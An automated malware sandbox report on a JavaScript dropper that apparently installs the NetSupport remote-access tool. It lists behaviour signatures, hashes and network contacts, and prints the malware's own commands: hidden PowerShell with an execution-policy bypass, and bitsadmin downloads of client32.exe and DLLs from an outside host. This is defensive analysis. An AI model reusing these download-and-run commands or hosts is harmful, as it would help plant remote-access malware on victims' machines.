Analysis Overview
SHA256
c4a3d1cec5bac2e0f1eb4671633ee0650b07831004130bd1d76c503655d2d26f
Threat Level: Known bad
The file ave6119jsjsjsjsjsjsjsjsjs.js was found to be: Known bad.
Malicious Activity Summary
NetSupport
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Enumerates physical storage devices
Download via BitsAdmin
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-09 19:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-09 19:19
Reported
2023-07-09 19:22
Platform
win7-20230703-en
Max time kernel
75s
Max time network
79s
Command Line
Signatures
Enumerates physical storage devices
Download via BitsAdmin
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | virvatulishop.com | udp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| US | 192.229.211.108:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1
| MD5 | 7269a83e127ff320b1f8810b6623ee98 |
| SHA1 | 52d53be0e3bf58d1a330f24f7a4f1f6ee543b4a2 |
| SHA256 | 9bb8941997354717115d7d57f559b16a5d4be037843cd2403ce16e61add7d404 |
| SHA512 | 3bb453737c33a01ea10d365b93685a0d53d7a396d0d1a46466a08388acc49e662fd25300e36695466690cbf9198df9bb50dc1dd0ac6bf92aa7e37ca5152e9877 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-09 19:19
Reported
2023-07-09 19:22
Platform
win10v2004-20230703-en
Max time kernel
143s
Max time network
151s
Command Line
Signatures
NetSupport
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 880 wrote to memory of 2660 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2660 wrote to memory of 2560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\i5e0n45.ps1
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.133.255.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.209.218.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | virvatulishop.com | udp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| US | 8.8.8.8:53 | 24.245.44.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deperekanuki1.com | udp |
| RU | 5.42.74.53:5222 | deperekanuki1.com | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| US | 8.8.8.8:53 | 53.74.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 51.142.119.24:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.119.142.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1mdb2oz.yys.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\i5e0n45.ps1
| MD5 | 5147a0d331648239ca26cbec34e9e166 |
| SHA1 | cf1616c225da3983a31378a176356d434f7b89ea |
| SHA256 | 0de826ed5b7c41eec6d359a8b560ba8df6d957da91452f1bb9e47119f0d3de58 |
| SHA512 | 067164752f00e9d5fdcbb6c1d7952c9fd8be0586db983c395536973507dea07e49c826683ffe97aa54c9a5b4257ab95002949a2332638cf25108e0cba2290629 |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll
| MD5 | 9c9302e75c25c2ba996efd89a1047205 |
| SHA1 | 9e79627ff32d5abd3382b65a509baeb31c78a7f2 |
| SHA256 | beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1 |
| SHA512 | d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1 |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC
| MD5 | b9956282a0fed076ed083892e498ac69 |
| SHA1 | d14a665438385203283030a189ff6c5e7c4bf518 |
| SHA256 | fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc |
| SHA512 | 7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini
| MD5 | a252f22f61f960c54fa32ae0de7dd17c |
| SHA1 | 00fe1097e70f1f6307e6bc68f40d49abb01dd2d5 |
| SHA256 | a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618 |
| SHA512 | 7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593 |
C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |